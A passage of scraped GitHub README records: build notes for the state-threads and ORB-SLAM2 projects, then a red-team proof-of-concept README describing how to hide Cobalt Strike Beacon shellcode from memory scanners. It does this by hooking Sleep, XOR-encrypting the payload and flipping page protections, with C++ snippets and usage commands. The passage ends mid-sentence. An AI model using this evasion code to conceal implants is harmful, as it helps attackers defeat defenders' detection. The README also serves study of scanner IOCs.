state-threads\n\n![](http://ossrs.net:8000/gif/v1/sls.gif?site=github.com&path=/srs/srsst)\n[![](https://github.com/ossrs/state-threads/actions/workflows/test.yml/badge.svg?branch=srs)](https://github.com/ossrs/state-threads/actions?query=workflow%3ATest+branch%3Asrs)\n[![](https://codecov.io/gh/ossrs/state-threads/branch/srs/graph/badge.svg)](https://codecov.io/gh/ossrs/state-threads/branch/srs)\n[![](https://cloud.githubusercontent.com/assets/2777660/22814959/c51cbe72-ef92-11e6-81cc-32b657b285d5.png)](https://ossrs.net/lts/zh-cn/contact)\n\nFork from http://sourceforge.net/projects/state-threads, patched for [SRS](https://github.com/ossrs/srs/tree/2.0release).\n\n> See: https://github.com/ossrs/state-threads/blob/srs/README\n\nFor the original ST without any changes, check out the [ST master branch](https://github.com/ossrs/state-threads/tree/master).\n\n## LICENSE\n\n[state-threads](https://github.com/ossrs/state-threads/blob/srs/README#L68) is licensed under [MPL or 
GPLv2](https://ossrs.net/lts/zh-cn/license#state-threads).\n\n## Linux: Usage\n\nGet code:\n\n```bash\ngit clone -b srs https://github.com/ossrs/state-threads.git\n```\n\nFor Linux:\n\n```bash\nmake linux-debug\n```\n\nFor Linux aarch64, which fails with `Unknown CPU architecture`:\n\n```bash\nmake linux-debug EXTRA_CFLAGS=\"-D__aarch64__\"\n```\n\n> Note: For more CPU architectures, please see [#22](https://github.com/ossrs/state-threads/issues/22)\n\nLinux with valgrind:\n\n```bash\nmake linux-debug EXTRA_CFLAGS=\"-DMD_VALGRIND\"\n```\n\n> Remark: The user must install valgrind, for instance, on centos6: `sudo yum install -y valgrind valgrind-devel`.\n\nLinux with valgrind and epoll:\n\n```bash\nmake linux-debug EXTRA_CFLAGS=\"-DMD_HAVE_EPOLL -DMD_VALGRIND\"\n```\n\n## Mac: Usage\n\nGet code:\n\n```bash\ngit clone -b srs https://github.com/ossrs/state-threads.git\n```\n\nFor OSX:\n\n```bash\nmake darwin-debug\n```\n\nFor OSX, the user must specify the valgrind header files:\n\n```bash\nmake darwin-debug EXTRA_CFLAGS=\"-DMD_HAVE_KQUEUE -DMD_VALGRIND -I/usr/local/include\"\n```\n\n> Remark: M1 is unsupported by ST, please use docker to run it; please read [SRS#2747](https://github.com/ossrs/srs/issues/2747).\n\n## Windows: Usage\n\nGet code:\n\n```bash\ngit clone -b srs https://github.com/ossrs/state-threads.git\n```\n\nFor Cygwin(Windows):\n\n```\nmake cygwin64-debug\n```\n\n> Remark: Windows native build is unsupported right now.\n\n## Branch SRS\n\nThe branch [srs](https://github.com/ossrs/state-threads/tree/srs) was patched and refined:\n\n- [x] ARM: Patch [st.arm.patch](https://github.com/ossrs/srs/blob/2.0release/trunk/3rdparty/patches/1.st.arm.patch), for ARM.\n- [x] OSX: Patch [st.osx.kqueue.patch](https://github.com/ossrs/srs/blob/2.0release/trunk/3rdparty/patches/3.st.osx.kqueue.patch), for osx.\n- [x] Linux: Patch [st.disable.examples.patch](https://github.com/ossrs/srs/blob/2.0release/trunk/3rdparty/patches/4.st.disable.examples.patch), for ubuntu.\n- [x] System: [Refine TAB of code](https://github.com/ossrs/state-threads/compare/c2001d30ca58f55d72a6cc6b9b6c70391eaf14db...d2101b26988b0e0db0aabc53ddf452068c1e2cbc).\n- [x] ARM: Merge from [michaeltalyansky](https://github.com/michaeltalyansky/state-threads) and [xzh3836598](https://github.com/ossrs/state-threads/commit/9a17dec8f9c2814d93761665df7c5575a4d2d8a3), support [ARM](https://github.com/ossrs/state-threads/issues/1).\n- [x] Valgrind: Merge from [toffaletti](https://github.com/toffaletti/state-threads), support [valgrind](https://github.com/ossrs/state-threads/issues/2) for ST.\n- [x] OSX: Patch [st.osx10.14.build.patch](https://github.com/ossrs/srs/blob/2.0release/trunk/3rdparty/patches/6.st.osx10.14.build.patch), for osx 10.14 build.\n- [x] ARM: Support macro `MD_ST_NO_ASM` to disable ASM, [#8](https://github.com/ossrs/state-threads/issues/8).\n- [x] AARCH64: Merge patch [srs#1282](https://github.com/ossrs/srs/issues/1282#issuecomment-445539513) to support aarch64, [#9](https://github.com/ossrs/state-threads/issues/9).\n- [x] OSX: Support OSX for Apple Darwin, macOS, [#11](https://github.com/ossrs/state-threads/issues/11).\n- [x] System: Refine performance for sleep or epoll_wait(0), [#17](https://github.com/ossrs/state-threads/issues/17).\n- [x] System: Support utest by gtest and coverage by gcov/gcovr.\n- [x] System: Only support for Linux and Darwin. [#19](https://github.com/ossrs/state-threads/issues/19), [srs#2188](https://github.com/ossrs/srs/issues/2188).\n- [x] System: Improve the performance of timer. 
[9fe8cfe5b](https://github.com/ossrs/state-threads/commit/9fe8cfe5b1c9741a2e671a46215184f267fba400), [7879c2b](https://github.com/ossrs/state-threads/commit/7879c2b), [387cddb](https://github.com/ossrs/state-threads/commit/387cddb)\n- [x] Windows: Support Windows 64bits. [#20](https://github.com/ossrs/state-threads/issues/20).\n- [x] MIPS: Support Linux/MIPS for OpenWRT, [#21](https://github.com/ossrs/state-threads/issues/21).\n- [x] LOONGARCH: Support loongarch for loongson CPU, [#24](https://github.com/ossrs/state-threads/issues/24). \n- [x] System: Support Multiple Threads for Linux and Darwin. [#19](https://github.com/ossrs/state-threads/issues/19), [srs#2188](https://github.com/ossrs/srs/issues/2188).\n- [x] RISCV: Support RISCV for RISCV CPU, [#24](https://github.com/ossrs/state-threads/pull/28).\n- [x] MIPS: Support Linux/MIPS64 for loongson 3A4000/3B3000, [#21](https://github.com/ossrs/state-threads/pull/21).\n- [x] AppleM1: Support Apple Silicon M1(aarch64), [#30](https://github.com/ossrs/state-threads/issues/30).\n- [x] IDE: Support CLion for debugging and learning.\n- [x] Define and use a new jmpbuf, because the structure is different.\n- [x] Check capability for backtrack.\n- [x] Support set specifics for any thread.\n- [x] Support st_destroy to free resources for asan.\n- [ ] System: Support sendmmsg for UDP, [#12](https://github.com/ossrs/state-threads/issues/12).\n\n## GDB Tools\n\n- [x] Support [nn_coroutines](https://github.com/ossrs/state-threads/issues/15#issuecomment-742218041), which shows the number of coroutines.\n- [x] Support [show_coroutines](https://github.com/ossrs/state-threads/issues/15#issuecomment-742218612), which shows all coroutines and their caller functions.\n\n## Valgrind\n\nTo learn how to debug with gdb under valgrind, read the [valgrind manual](http://valgrind.org/docs/manual/manual-core-adv.html#manual-core-adv.gdbserver-simple).\n\nFor startup parameters, read the [valgrind cli](http://valgrind.org/docs/manual/mc-manual.html#mc-manual.options) reference.\n\nImportant cli options:\n\n1. `--undef-value-errors= [default: yes]`, Controls whether Memcheck reports uses of undefined value errors. Set this to no if you don't want to see undefined value errors. It also has the side effect of speeding up Memcheck somewhat.\n1. `--leak-check= [default: summary]`, When enabled, search for memory leaks when the client program finishes. If set to summary, it says how many leaks occurred. If set to full or yes, each individual leak will be shown in detail and/or counted as an error, as specified by the options `--show-leak-kinds` and `--errors-for-leak-kinds`.\n1. `--track-origins= [default: no]`, Controls whether Memcheck tracks the origin of uninitialised values. By default, it does not, which means that although it can tell you that an uninitialised value is being used in a dangerous way, it cannot tell you where the uninitialised value came from. This often makes it difficult to track down the root problem.\n1. `--show-reachable= , --show-possibly-lost=`, to show memory that is still in use.\n
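\nPutting these together, an illustrative valgrind invocation (assuming ST and the utest binary from the sections below were built with `-DMD_VALGRIND`) might look like:\n\n```bash\nvalgrind --leak-check=full --track-origins=yes --show-reachable=yes ./obj/st_utest\n```\n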
\n## Linux: UTest\n\n> Note: We use [Google test](https://github.com/google/googletest/releases/tag/release-1.11.0) in `utest/gtest-fit`.\n\nTo make ST with utest and run it:\n\n```bash\nmake linux-debug-utest && ./obj/st_utest\n```\n\nNote that the gcc(4.8) of CentOS is too old, please use docker(`ossrs/srs:dev-gcc7`) to run:\n\n```bash\ndocker run --rm -it -v $(pwd):/state-threads -w /state-threads \\\n registry.cn-hangzhou.aliyuncs.com/ossrs/srs:dev-gcc7 \\\n bash -c 'make linux-debug-utest && ./obj/st_utest'\n```\n\n## Mac: UTest\n\n> Note: We use [Google test](https://github.com/google/googletest/releases/tag/release-1.11.0) in `utest/gtest-fit`.\n\nTo make ST with utest and run it:\n\n```bash\nmake darwin-debug-utest && ./obj/st_utest\n```\n\n## Linux: Coverage\n\n> Note: We use [Google test](https://github.com/google/googletest/releases/tag/release-1.11.0) in `utest/gtest-fit`.\n\nTo make ST with utest and run it:\n\n```bash\nmake linux-debug-gcov && ./obj/st_utest\n```\n\nNote that the gcc(4.8) of CentOS is too old, please use docker(`ossrs/srs:dev-gcc7`) to run:\n\n```bash\ndocker run --rm -it -v $(pwd):/state-threads -w /state-threads \\\n registry.cn-hangzhou.aliyuncs.com/ossrs/srs:dev-gcc7 \\\n bash -c 'make linux-debug-gcov && ./obj/st_utest'\n```\n\nThen, install [gcovr](https://gcovr.com/en/stable/guide.html) for coverage:\n\n```bash\nyum install -y python2-pip &&\npip install lxml && pip install gcovr\n```\n\nFinally, run the tests and get the report:\n\n```bash\nbash auto/coverage.sh\n```\n\n## Mac: Coverage\n\n> Note: We use [Google test](https://github.com/google/googletest/releases/tag/release-1.11.0) in `utest/gtest-fit`.\n\nTo make ST with utest and run it:\n\n```bash\nmake darwin-debug-gcov && ./obj/st_utest\n```\n\nThen, install [gcovr](https://gcovr.com/en/stable/guide.html) for coverage:\n\n```bash\npip install gcovr\n```\n\nFinally, run the tests and get the report:\n\n```bash\nbash auto/coverage.sh\n```\n\n## Docs & Analysis\n\n* Introduction: http://ossrs.github.io/state-threads/docs/st.html\n* API reference: http://ossrs.github.io/state-threads/docs/reference.html\n* Programming notes: http://ossrs.github.io/state-threads/docs/notes.html\n\n* [How to porting ST to other OS/CPU?](https://github.com/ossrs/state-threads/issues/22)\n* About setjmp and longjmp, read [setjmp](https://gitee.com/winlinvip/srs-wiki/raw/master/images/st-setjmp.jpg).\n* About the stack structure, read [stack](https://gitee.com/winlinvip/srs-wiki/raw/master/images/st-stack.jpg)\n* About asm code comments, read [#91d530e](https://github.com/ossrs/state-threads/commit/91d530e#diff-ed9428b14ff6afda0e9ab04cc91d4445R25).\n* About the scheduler, read [#13-scheduler](https://github.com/ossrs/state-threads/issues/13#issuecomment-616025527).\n* About the IO event system, read [#13-IO](https://github.com/ossrs/state-threads/issues/13#issuecomment-616096568).\n* For code analysis, please read [#15](https://github.com/ossrs/state-threads/issues/15).\n\n## CLion\n\nUse [CLion](https://www.jetbrains.com/clion/) to open the state-threads directory.\n\nThen, open `ide/st_clion/CMakeLists.txt` and click `Load CMake project`.\n\nFinally, select a configuration to run or debug.\n\nWinlin 2016\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gaoxiang12/ORBSLAM2_with_pointcloud_map", "link": "https://github.com/gaoxiang12/ORBSLAM2_with_pointcloud_map", "tags": [], "stars": 
648, "description": null, "lang": "C++", "repo_lang": "", "readme": "# ORBSLAM2_with_pointcloud_map\nThis is a modified ORB_SLAM2 (from https://github.com/raulmur/ORB_SLAM2, thanks for Raul's great work!) with a online point cloud map module running in RGB-D mode. You can visualize your point cloud map during the SLAM process. \n\n# How to Install\nUnzip the file you will find two directories. First compile the modified g2o:\n\n```\n cd g2o_with_orbslam2\n mkdir build\n cd build\n cmake ..\n make \n```\n\nFollowing the instructions from the original g2o library: [https://github.com/RainerKuemmerle/g2o] if you have dependency problems. I just add the extra vertecies and edges provided in ORB_SLAM2 into g2o. \n\nThen compile the ORB_SLAM2. You need firstly to compile the DBoW2 in ORB_SLAM2_modified/Thirdpary, and then the Pangolin module (https://github.com/stevenlovegrove/Pangolin). Finally, build ORB_SLAM2:\n\n```\ncd ORB_SLAM2_modified\nmkdir build\ncd build\ncmake ..\nmake\n```\n\nTo run the program you also need to download the ORB vocabulary (which is a large file so I don't upload it) in the original ORB_SLAM2 repository.\n\n# Run examples\nPrepare a RGBD camera or dataset, give the correct parameters and you can get a ORB SLAM with point cloud maps like the example.jpg in this repo.\n\n# Build the unpacked modified repo \n\nplease see this [README](./ORB_SLAM2_modified/README.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mgeeky/ShellcodeFluctuation", "link": "https://github.com/mgeeky/ShellcodeFluctuation", "tags": [], "stars": 648, "description": "An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents", "lang": "C++", "repo_lang": "", "readme": "# Shellcode Fluctuation PoC\n\nA PoC implementation for an another in-memory evasion technique that cyclically encrypts and decrypts shellcode's contents to then make it fluctuate between `RW` (or `NoAccess`) and `RX` memory protection.\nWhen our shellcode resides in `RW` or `NoAccess` memory pages, scanners such as [`Moneta`](https://github.com/forrest-orr/moneta) or [`pe-sieve`](https://github.com/hasherezade/pe-sieve) will be unable to track it down and dump it for further analysis.\n\n## Intro\n\nAfter releasing [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer) I've received a few questions about the following README's point:\n\n> Change your Beacon's memory pages protection to RW (from RX/RWX) and encrypt their contents before sleeping (that could evade scanners such as Moneta or pe-sieve)\n\nBeforewards I was pretty sure the community already know how to encrypt/decrypt their payloads and flip their memory protections to simply evade memory scanners looking for anomalous executable regions.\nQuestions proven otherwise so I decided to release this unweaponized PoC to document yet another evasion strategy and offer sample implementation for the community to work with.\n\nThis PoC is a demonstration of rather simple technique, already known to the offensive community (so I'm not bringin anything new here really) in hope to disclose secrecy behind magic showed by some commercial frameworks that demonstrate their evasion capabilities targeting both aforementioned memory scanners.\n\n\n**Here's a comparison when fluctuating to RW** (another option is to fluctuate to `PAGE_NOACCESS` - described below):\n\n1. Beacon not encrypted\n2. 
\n# Build the unpacked modified repo \n\nPlease see this [README](./ORB_SLAM2_modified/README.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mgeeky/ShellcodeFluctuation", "link": "https://github.com/mgeeky/ShellcodeFluctuation", "tags": [], "stars": 648, "description": "An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents", "lang": "C++", "repo_lang": "", "readme": "# Shellcode Fluctuation PoC\n\nA PoC implementation for another in-memory evasion technique that cyclically encrypts and decrypts the shellcode's contents to make it fluctuate between `RW` (or `NoAccess`) and `RX` memory protection.\nWhen our shellcode resides in `RW` or `NoAccess` memory pages, scanners such as [`Moneta`](https://github.com/forrest-orr/moneta) or [`pe-sieve`](https://github.com/hasherezade/pe-sieve) will be unable to track it down and dump it for further analysis.\n\n## Intro\n\nAfter releasing [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer) I've received a few questions about the following README's point:\n\n> Change your Beacon's memory pages protection to RW (from RX/RWX) and encrypt their contents before sleeping (that could evade scanners such as Moneta or pe-sieve)\n\nBeforehand I was pretty sure the community already knows how to encrypt/decrypt their payloads and flip their memory protections to simply evade memory scanners looking for anomalous executable regions.\nThe questions proved otherwise, so I decided to release this unweaponized PoC to document yet another evasion strategy and offer a sample implementation for the community to work with.\n\nThis PoC is a demonstration of a rather simple technique, already known to the offensive community (so I'm not bringing anything new here really), in hope to disclose the secrecy behind the magic shown by some commercial frameworks that demonstrate their evasion capabilities targeting both aforementioned memory scanners.\n\n\n**Here's a comparison when fluctuating to RW** (another option is to fluctuate to `PAGE_NOACCESS` - described below):\n\n1. Beacon not encrypted\n2. **Beacon encrypted** (_fluctuating_)\n\n![comparison](images/comparison.png)\n\n\nThis implementation, along with my [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer), brings the Offensive Security community sample implementations to catch up with the offerings of commercial C2 products, so that we can do no worse in our Red Team toolings. \ud83d\udcaa\n\n---\n\n## How it works?\n\nThis program performs shellcode self-injection (roughly via the classic `VirtualAlloc` + `memcpy` + `CreateThread`). \nWhen the shellcode runs (this implementation specifically targets Cobalt Strike Beacon implants), a Windows function (`kernel32!Sleep`) is hooked to intercept the moment when the Beacon falls asleep. \nWhenever the hooked `MySleep` function gets invoked, it will localise the shellcode's memory allocation boundaries, flip their protection to `RW` and `xor32` all the bytes stored there. \nHaving awaited the expected amount of time, when the shellcode gets back to our `MySleep` handler, we decrypt the shellcode's data and flip its protection back to `RX`. (A minimal sketch of this housekeeping appears after the two step lists below.)\n\n### Fluctuation to `PAGE_READWRITE` works as follows\n\n1. Read shellcode's contents from file.\n2. Hook `kernel32!Sleep` pointing back to our callback.\n3. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. In contrast to what we had in `ThreadStackSpoofer`, here we're not hooking anything in ntdll to launch our shellcode but rather jump to it from our own function. This attempts to avoid leaving simple IOCs in memory pointing at modified ntdll memory.\n4. As soon as the Beacon attempts to sleep, our `MySleep` callback gets invoked.\n5. Beacon's memory allocation gets encrypted and its protection flipped to `RW`.\n6. We then unhook the original `kernel32!Sleep` to avoid leaving a simple IOC in memory pointing that `Sleep` has been trampolined (in-line hooked).\n7. A call to the original `::Sleep` is made to let the Beacon sleep while waiting for further communication.\n8. After Sleep is finished, we decrypt our shellcode's data, flip its memory protection back to `RX` and then re-hook `kernel32!Sleep` to ensure interception of the subsequent sleep.\n\n### Fluctuation to `PAGE_NOACCESS` works as follows\n\n1. Read shellcode's contents from file.\n2. Hook `kernel32!Sleep` pointing back to our callback.\n3. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread` ...\n4. Initialize a Vectored Exception Handler (VEH) to set up our own handler that will catch _Access Violation_ exceptions.\n5. As soon as the Beacon attempts to sleep, our `MySleep` callback gets invoked.\n6. Beacon's memory allocation gets encrypted and its protection flipped to `PAGE_NOACCESS`.\n7. We then unhook the original `kernel32!Sleep` to avoid leaving a simple IOC in memory pointing that `Sleep` has been trampolined (in-line hooked).\n8. A call to the original `::Sleep` is made to let the Beacon sleep while waiting for further communication.\n9. After Sleep is finished, we re-hook `kernel32!Sleep` to ensure interception of the subsequent sleep.\n10. The shellcode then attempts to resume its execution, which results in an Access Violation being thrown since its pages are marked NoAccess.\n11. Our VEH handler catches the exception, decrypts the data and flips memory protection back to `RX`, and the shellcode's execution is resumed.\n
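\nTo make the housekeeping step concrete, here is a minimal, hypothetical sketch of the `PAGE_READWRITE` flow plus the VEH restore step used by the `PAGE_NOACCESS` variant (an illustrative stand-in, not the repo's actual code - the globals and helper names are made up):\n\n```\n#include <windows.h>\n\n// Illustrative globals describing the injected shellcode allocation.\nBYTE*  g_shellcode     = nullptr;\nSIZE_T g_shellcodeSize = 0;\nDWORD  g_xorKey        = 0x1e602f0d; // example XOR32 key, as seen in the demo output\n\n// XOR32 is symmetric: the same routine encrypts and decrypts in place.\nvoid xor32(BYTE* addr, SIZE_T size, DWORD key)\n{\n    for (SIZE_T i = 0; i + sizeof(DWORD) <= size; i += sizeof(DWORD))\n        *reinterpret_cast<DWORD*>(addr + i) ^= key;\n}\n\n// PAGE_READWRITE flavour: encrypt + flip to RW around the original ::Sleep call.\nvoid fluctuateReadWrite(DWORD dwMilliseconds)\n{\n    DWORD old = 0;\n    ::VirtualProtect(g_shellcode, g_shellcodeSize, PAGE_READWRITE, &old);\n    xor32(g_shellcode, g_shellcodeSize, g_xorKey);   // encrypt\n\n    ::Sleep(dwMilliseconds); // no plaintext RX payload in memory while sleeping\n\n    xor32(g_shellcode, g_shellcodeSize, g_xorKey);   // decrypt\n    ::VirtualProtect(g_shellcode, g_shellcodeSize, PAGE_EXECUTE_READ, &old);\n}\n\n// PAGE_NOACCESS flavour: a VEH (registered once via AddVectoredExceptionHandler)\n// restores the pages when the resuming shellcode triggers an Access Violation.\nLONG CALLBACK restoreShellcodeVeh(PEXCEPTION_POINTERS info)\n{\n    ULONG_PTR fault = info->ExceptionRecord->ExceptionInformation[1];\n    if (info->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION\n        && fault >= (ULONG_PTR)g_shellcode\n        && fault < (ULONG_PTR)g_shellcode + g_shellcodeSize)\n    {\n        DWORD old = 0;\n        ::VirtualProtect(g_shellcode, g_shellcodeSize, PAGE_READWRITE, &old);\n        xor32(g_shellcode, g_shellcodeSize, g_xorKey); // decrypt\n        ::VirtualProtect(g_shellcode, g_shellcodeSize, PAGE_EXECUTE_READ, &old);\n        return EXCEPTION_CONTINUE_EXECUTION;\n    }\n    return EXCEPTION_CONTINUE_SEARCH;\n}\n```\n\nIn the actual PoC this logic runs from the hooked `MySleep` callback, which also unhooks and re-hooks `Sleep` around the wait, as described in the steps above.\n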
\n\nActually, I've been introduced to the idea of flipping shellcode's memory protection couple of years back through the work of [**Josh Lospinoso**](https://github.com/JLospinoso) in his amazing [Gargoyle](https://github.com/JLospinoso/gargoyle).\n\nHere's more background:\n- [gargoyle, a memory scanning evasion technique](https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)\n- [Bypassing Memory Scanners with Cobalt Strike and Gargoyle](https://labs.f-secure.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/)\n\n**Gargoyle** takes the concept of self-aware and self-fluctuating shellcode a way further, by leveraging ROP sequence calling out to `VirtualProtect`. \nHowever the technique is impressive, its equally hard to leverage it with Cobalt Strike's Beacon without having to kill its thread and keep re-initializing Beacon while in memory.\n\nThat's far from perfect, however since we already operate from the grounds of our own self-injection loader process, we're able to do whatever we want with the environment in which shellcode operate and hide it however we like. This technique (and the previous one being [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer)) shows advantages from running our shellcodes this way.\n\nThe implementation of fluctuating to `PAGE_NOACCESS` is inspired by [ORCA666](https://github.com/ORCA666)'s work presented in his https://github.com/ORCA666/0x41 injector.\nHe showed that:\n\n1. we can initialize a vectored exception handler (VEH), \n2. flip shellcode's pages to no-access\n3. and then catch Access Violation exceptions that will occur as soon as the shellcode wants to resume its execution and decrypt + flip its memory pages back to Read+Execute.\n\nThis implementation contains this idea implemented, available with option `2` in ``. \nBe sure to check out other his projects as well.\n\n---\n\n## Demo\n\nThe tool `ShellcodeFluctuation` accepts three parameters: first one being path to the shellcode and the second one modifier of our functionality.\n\n```\nUsage: ShellcodeFluctuation.exe \n:\n -1 - Read shellcode but dont inject it. Run in an infinite loop.\n 0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything\n 1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.\n 2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.\n```\n\n### Moneta (seemingly) False Positive\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin -1\n```\n\nSo firstly we'll see what `Moneta64` scanner thinks about process that does nothing dodgy and simply resorts to run an infinite loop:\n\n![moneta false positive](images/false-positive.png)\n\nAs we can see there's some **false positive** (at least how I consider it) allegdly detecting `Mismatching PEB module` / `Phantom image`. \nThe memory boundaries point at the `ShellcodeFluctuate.exe` module itself and could indicate that this module however being of `MEM_IMAGE` type, is not linked in process' PEB - which is unsual and sounds rather odd.\nThe reason for this IOC is not known to me and I didn't attempt to understand it better, yet it isn't something we should be concerned about really.\n\nIf anyone knows what's the reason for this detection, I'd be very curious to hear! 
Please do reach out.\n\n### Not Encrypted Beacon\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 0\n```\n\nThe second use case presents the Memory IOCs of a Beacon operating within our process which does not utilise any sort of customised `Artifact Kits`, `User-Defined Reflective Loaders` (such as my [`ElusiveMice`](https://github.com/mgeeky/ElusiveMice)), nor any initial actions that would spoil our results. \n\n![moneta not encrypted](images/not-encrypted.png)\n\nWe can see that `Moneta64` correctly recognizes `Abnormal private executable memory` pointing at the location where our shellcode resides. \nThat's a really strong Memory IOC exposing our shellcode to getting dumped and analysed by automated scanners. Not cool.\n\n### Encrypted Beacon with RW protections\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 1\n```\n\nNow the third use case, the most interesting one from the perspective of this implementation: the _fluctuating_ Beacon.\n\n![moneta encrypted](images/encrypted.png)\n\nApart from the first IOC, considered a somewhat _false positive_, we see a new one pointing out that `kernel32.dll` memory was modified. \nHowever, no `Abnormal private executable memory` IOC this time. Our fluctuation (repeated encryption/decryption and memory protection flipping) is active.\n\nAnd for the record, `pe-sieve` also detects the implanted PE when used with the `/data 3` option (unless this option is given, no detection will be made):\n\n![pe-sieve](images/pe-sieve3.png)\n\nMy current assumption is that PE-Sieve is picking up on the same traits that Moneta does (described below in _Modified code in kernel32.dll_) - the fact that a PE-mapped module has a non-empty Working set, an evident sign of code injection of some sort.\nThat is labeled as _Implanted PE_ / _Implanted_. If that's the case, the conclusion is similar to Moneta's observation. I don't think we should care that much about that IOC detection-wise.\n\nSo far I have thought of no better option to intercept the shellcode's execution in the middle (speaking of Cobalt Strike) than to hook `kernel32!Sleep`. Thus, we are bound to leave these sorts of IOCs.\n\nBut hey, still none of the bytes differ compared to what is lying out there on the filesystem (`C:\\Windows\\System32\\kernel32.dll`) and no function is hooked, so what's the deal? \ud83d\ude09\n\n\n\n### Encrypted Beacon with PAGE_NOACCESS protections\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 2\n```\n\n![no-access](images/no-access1.png)\n\nThat will cause the shellcode to effectively fluctuate between `RX` and `NA` pages.\n\nAt the moment I'm not sure of the benefits of flipping into `PAGE_NOACCESS` instead of `PAGE_READWRITE`. \n\n\n### Modified code in kernel32.dll\n\nSo what about that modified `kernel32` IOC?\n\nNow, let us attempt to get to the bottom of this IOC and see what's the deal here.\n\nFirstly, we'll dump the mentioned memory region - the `.text` (code) section of `kernel32.dll`. Let us use `ProcessHacker` for that purpose, to utilise publicly known and stable tooling:\n\n![dump-kernel](images/dump-kernel.png)\n\nWe dump the code section of the allegedly modified kernel32 and then we do the same for the kernel32 running in a process that did not modify that area.\n\nHaving acquired the two dumps, we can then compare them byte-wise (using my [expdevBadChars](https://github.com/mgeeky/expdevBadChars)) to look for any inconsistencies:\n\n![bindiff](images/bindiff0.png)\n\nJust to see that they match one another. 
Clearly there isn't a single byte modified in `kernel32.dll`, and the reason is that we're unhooking `kernel32!Sleep` before calling it:\n\n`main.cpp:31:`\n```\n HookTrampolineBuffers buffers = { 0 };\n buffers.originalBytes = g_hookedSleep.sleepStub;\n buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n //\n // Unhook kernel32!Sleep to evade hooked Sleep IOC. \n // We leverage the fact that the return address left on the stack will make the thread\n // get back to our handler anyway.\n //\n fastTrampoline(false, (BYTE*)::Sleep, &MySleep, &buffers);\n\n // Perform sleep emulating originally hooked functionality.\n ::Sleep(dwMilliseconds);\n```\n\nSo what's causing the IOC to be triggered? Let us inspect `Moneta` more closely:\n\n![moneta](images/moneta.png)\n\nBreaking into Moneta's `Ioc.cpp` just around line 104, where it reports the `MODIFIED_CODE` IOC, we can modify the code a little to better expose the exact moment when it analyses the kernel32 pool.\nNow:\n\n1. A check is made to ensure that kernel32's region is executable. We see that in fact that region is executable: `a = true`\n2. The amount of that module's private memory is acquired. Here we see that `kernel32` has `b = 0x1000` private bytes. How come? There should be `0` of them.\n3. If an executable allocation has more than 0 bytes of private memory (`a && b`), the IOC is reported\n4. And that's proof that we were examining kernel32 at that time.\n\nWhen the Windows Image Loader maps a DLL module into the process' memory space, the underlying memory pages will be labeled as `MEM_MAPPED` or `MEM_IMAGE` depending on the scenario. \nWhenever we modify even a single byte of a `MEM_MAPPED`/`MEM_IMAGE` allocation, the system will separate a single memory page (assuming we modified less than `PAGE_SIZE` bytes and did not cross a page boundary) to indicate the fragment that no longer maps back to the original image.\n\nThis observation is then utilised as an IOC - an image should not have `MEM_PRIVATE` allocations within its memory region (inside of it) because that would indicate that some bytes were once modified within that region. Moneta correctly picks up on the code modification even though the bytes matched the original module's bytes at the time of comparison.\n\nFor a comprehensive explanation of how Moneta, the process injection implementation and the related IOCs work under the hood, read the following top-quality articles by **Forrest Orr**:\n\n1. [Masking Malicious Memory Artifacts \u2013 Part I: Phantom DLL Hollowing](https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing)\n2. [Masking Malicious Memory Artifacts \u2013 Part II: Blending in with False Positives](https://www.forrest-orr.net/post/masking-malicious-memory-artifacts-part-ii-insights-from-moneta)\n3. 
[Masking Malicious Memory Artifacts \u2013 Part III: Bypassing Defensive Scanners](https://www.cyberark.com/resources/threat-research-blog/masking-malicious-memory-artifacts-part-iii-bypassing-defensive-scanners)\n\nThat's truly outstanding research and documentation by Forrest - great work, pal!\n\nThe second article especially outlines the justification for this detection, as we read what Forrest teaches us:\n\n> In the event that the module had been legitimately loaded and added to the PEB, the shellcode implant would still have been detected due to the 0x1000 bytes (1 page) of memory privately mapped into the address space and retrieved by Moneta by querying its working set - resulting in a modified code IOC as seen above.\n\n\nTo summarise, we're leaving an IOC behind - but should we be worried about that?\nEven if there's an IOC, there are no stolen bytes visible, so there is no immediate reference pointing back to our shellcode or distinguishing our shellcode's technique from others.\n\nLong story short - we shouldn't really be worried about that IOC. :-)\n\n\n### But commercial frameworks leave no IOCs\n\nOne can say that this implementation is far from perfect because it still leaves something - there are IOCs - while the commercial products show they don't have similar traits.\n\nWhen that argument's on the table I need to point out that the commercial frameworks have complete control over the source code of their implants and shellcode loaders, and thus can nicely integrate one with the other to avoid the necessity of hooking and hacking around their shellcode themselves. Here, we need to hook `kernel32!Sleep` to intercept Cobalt Strike's Beacon execution just before it falls asleep in order to kick off our housekeeping. If there were a better mechanism for us to kick in without having to hook sleep - that would be perfect.\n\nHowever, while there is a notion of a [_Sleep Mask_](https://www.cobaltstrike.com/help-sleep-mask-kit) introduced to Cobalt Strike, its size restriction of a few hundred bytes makes us totally unable to introduce this logic into the mask itself (otherwise we'd be able to avoid hooking `Sleep` as well, leaving no IOCs just like commercial 